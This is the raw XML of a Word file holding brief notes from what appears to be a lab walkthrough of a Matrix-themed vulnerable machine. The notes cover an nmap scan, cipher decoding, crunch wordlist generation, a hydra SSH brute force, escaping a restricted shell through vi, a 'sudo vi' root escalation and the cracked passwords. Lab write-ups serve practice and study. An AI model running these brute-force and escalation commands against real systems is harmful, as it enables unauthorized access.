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09EED" w14:textId="1903709D" w:rsidR="002124DB" w:rsidRDefault="00E67DA7">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E67DA7">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E67DA7">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E67DA7">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E67DA7">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E67DA7">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E67DA7">
        <w:t xml:space="preserve"> 192.168.1.174 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E67DA7">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F0719B0" w14:textId="4C58D25A" w:rsidR="004654F9" w:rsidRDefault="004654F9" w:rsidP="004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4F9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Paul Krishnamurthy 2016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068AA09D" w14:textId="6FF1A246" w:rsidR="003A210A" w:rsidRPr="004654F9" w:rsidRDefault="003A210A" w:rsidP="004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03E44B" w14:textId="3E7845FF" w:rsidR="00E67DA7" w:rsidRDefault="003A210A">
      <w:r w:rsidRPr="00E67DA7">
        <w:t>192.168.1.174</w:t>
      </w:r>
      <w:r>
        <w:t>:31337/cyphertext.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA5AB12" w14:textId="317A5DF7" w:rsidR="00D34797" w:rsidRDefault="00D776D3">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00D34797" w:rsidRPr="008A44C5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.dcode.fr/brainfuck-language</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D34797">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D34797">
        <w:t>( decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D34797">
        <w:t xml:space="preserve"> cypher text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC955D" w14:textId="77777777" w:rsidR="004C066D" w:rsidRPr="00F01688" w:rsidRDefault="004C066D" w:rsidP="004C066D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01688">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  (You can enter into matrix as guest, with password k1ll0rXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E738E98" w14:textId="0EB14D53" w:rsidR="004C066D" w:rsidRDefault="004C066D" w:rsidP="004C066D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01688">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F00F97" w14:textId="108FA0F1" w:rsidR="00F01688" w:rsidRDefault="001F740E" w:rsidP="004C066D">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F740E">
        <w:t>crunch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F740E">
        <w:t xml:space="preserve"> 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t k1ll0r@@ -o mywordlist1  </w:t>
      </w:r>
      <w:r w:rsidR="000F5D2D">
        <w:t>(create your own wordlist for password)</w:t>
      </w:r>
      <w:r w:rsidR="00093EA0">
        <w:t xml:space="preserve">  or cup </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00093EA0">
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00093EA0">
        <w:t xml:space="preserve"> repo or mp64 </w:t>
      </w:r>
      <w:r w:rsidR="00093EA0" w:rsidRPr="000F5D2D">
        <w:t>k1ll0r</w:t>
      </w:r>
      <w:r w:rsidR="00093EA0">
        <w:t>?a?a &gt;&gt; wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711DF4C5" w14:textId="346AD2C2" w:rsidR="00793946" w:rsidRDefault="00793946" w:rsidP="004C066D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE58D5">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE58D5">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE58D5">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE58D5">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE58D5">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>shar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE58D5">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>/crunch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE58D5">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>charset.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE58D5" w:rsidRPr="00DE58D5">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for type of crunch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0124253C" w14:textId="30F56431" w:rsidR="000305DE" w:rsidRPr="00DE58D5" w:rsidRDefault="000305DE" w:rsidP="004C066D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000305DE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>crunch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000305DE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 3 -f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>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/share/crunch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000305DE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>charset.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000305DE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000305DE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>mixalpha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000305DE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>-numeric-all-space-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000305DE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000305DE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000305DE">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>mywordlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="406AB71D" w14:textId="58FFA3A2" w:rsidR="00D766D4" w:rsidRDefault="00D766D4" w:rsidP="004C066D"/>
    <w:p w14:paraId="62355E5C" w14:textId="4B74D7EC" w:rsidR="00D766D4" w:rsidRDefault="00D766D4" w:rsidP="004C066D">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D766D4">
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D766D4">
        <w:t xml:space="preserve"> -l guest -P /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D766D4">
        <w:t>mywordlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D766D4">
        <w:t xml:space="preserve"> 192.168.1.174  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D766D4">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D766D4">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C49E1" w14:textId="6DB82ED2" w:rsidR="00F251D1" w:rsidRDefault="00F251D1" w:rsidP="004C066D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F5D2D">
        <w:t>k1ll0r</w:t>
      </w:r>
      <w:r>
        <w:t>7n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE911F1" w14:textId="2FE22DAD" w:rsidR="00D9096E" w:rsidRPr="0008286A" w:rsidRDefault="0008286A" w:rsidP="004C066D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0008286A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>another</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0008286A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> user (</w:t>
      </w:r>
      <w:r w:rsidR="00D9096E" w:rsidRPr="0008286A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>trinity</w:t>
      </w:r>
      <w:r w:rsidRPr="0008286A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FF1533" w14:textId="473E79DF" w:rsidR="0008286A" w:rsidRDefault="0008286A" w:rsidP="004C066D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is restricted except </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vi</w:t>
      </w:r>
      <w:r w:rsidR="00D776D3">
        <w:t>editor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D776D3">
        <w:t xml:space="preserve"> esc :!/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D776D3">
        <w:t>bassh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D776D3">
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D776D3">
        <w:t>restricyon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D776D3">
        <w:t xml:space="preserve"> will remove)</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="18F156B6" w14:textId="7D985410" w:rsidR="00D776D3" w:rsidRDefault="00D776D3" w:rsidP="004C066D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>go</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to vi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B97492C" w14:textId="77777777" w:rsidR="00DE457D" w:rsidRDefault="00DE457D" w:rsidP="00DE457D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>Echo $SHELL   /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DEE6C9" w14:textId="77777777" w:rsidR="00DE457D" w:rsidRDefault="00DE457D" w:rsidP="00DE457D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>Echo $PATH     /bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3348AA00" w14:textId="77777777" w:rsidR="00DE457D" w:rsidRDefault="00DE457D" w:rsidP="00DE457D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05AE9AF2" w14:textId="77777777" w:rsidR="00DE457D" w:rsidRDefault="00DE457D" w:rsidP="00DE457D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>Set shell=bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167ADA55" w14:textId="77777777" w:rsidR="00DE457D" w:rsidRDefault="00DE457D" w:rsidP="00DE457D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0216AD00" w14:textId="77777777" w:rsidR="00DE457D" w:rsidRDefault="00DE457D" w:rsidP="00DE457D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF77C5E" w14:textId="77777777" w:rsidR="00DE457D" w:rsidRDefault="00DE457D" w:rsidP="00DE457D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>Export SHELL=/bin/bash</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436AF1CD" w14:textId="77777777" w:rsidR="00DE457D" w:rsidRPr="008F249E" w:rsidRDefault="00DE457D" w:rsidP="00DE457D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>Export path=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>bin:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531A1B54" w14:textId="77777777" w:rsidR="00DE457D" w:rsidRDefault="00DE457D" w:rsidP="004C066D"/>
    <w:p w14:paraId="48DA15FF" w14:textId="766AAB07" w:rsidR="007E6139" w:rsidRDefault="007E6139" w:rsidP="004C066D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>export</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (to find current the path and shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75303316" w14:textId="7BA8DE91" w:rsidR="00331C5B" w:rsidRDefault="00331C5B" w:rsidP="004C066D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>put</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the :!/bin/bash in vi editor then it will remove restriction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186F55F1" w14:textId="1509C0AC" w:rsidR="006D59B0" w:rsidRDefault="006D59B0" w:rsidP="004C066D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>export=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>PATH=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin:/bin</w:t>
      </w:r>
      <w:r w:rsidR="002573D7">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323136AA" w14:textId="70485E91" w:rsidR="00921C0A" w:rsidRPr="0008286A" w:rsidRDefault="00921C0A" w:rsidP="004C066D">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00921C0A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00921C0A">
        <w:t xml:space="preserve"> vi -c ':!/bin/bash' /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4388E18B" w14:textId="77777777" w:rsidR="00C6518B" w:rsidRDefault="00C6518B" w:rsidP="00C6518B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password  </w:t>
      </w:r>
      <w:r w:rsidRPr="000F5D2D">
        <w:t>k1ll0r</w:t>
      </w:r>
      <w:r>
        <w:t>7n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E45C60" w14:textId="75417B97" w:rsidR="00C6518B" w:rsidRPr="000F5D2D" w:rsidRDefault="00C6518B" w:rsidP="004C066D"/>
    <w:sectPr w:rsidR="00C6518B" w:rsidRPr="000F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74"/>
    <w:rsid w:val="000305DE"/>
    <w:rsid w:val="0008286A"/>
    <w:rsid w:val="00093EA0"/>
    <w:rsid w:val="000F5D2D"/>
    <w:rsid w:val="001F740E"/>
    <w:rsid w:val="002124DB"/>
    <w:rsid w:val="002573D7"/>
    <w:rsid w:val="00331C5B"/>
    <w:rsid w:val="003A210A"/>
    <w:rsid w:val="004654F9"/>
    <w:rsid w:val="004C066D"/>
    <w:rsid w:val="004D0C74"/>
    <w:rsid w:val="006D59B0"/>
    <w:rsid w:val="007663A6"/>
    <w:rsid w:val="00793946"/>
    <w:rsid w:val="007E6139"/>
    <w:rsid w:val="00921C0A"/>
    <w:rsid w:val="00C6518B"/>
    <w:rsid w:val="00D34797"/>
    <w:rsid w:val="00D766D4"/>
    <w:rsid w:val="00D776D3"/>
    <w:rsid w:val="00D9096E"/>
    <w:rsid w:val="00DE457D"/>
    <w:rsid w:val="00DE58D5"/>
    <w:rsid w:val="00E67DA7"/>
    <w:rsid w:val="00F01688"/>
    <w:rsid w:val="00F251D1"/>
    <w:rsid w:val="00FD2AD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3CE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C8ADA49A-B32E-4EB4-8769-9D41047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47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code.fr/brainfuck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27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-01T18:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-02T16:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>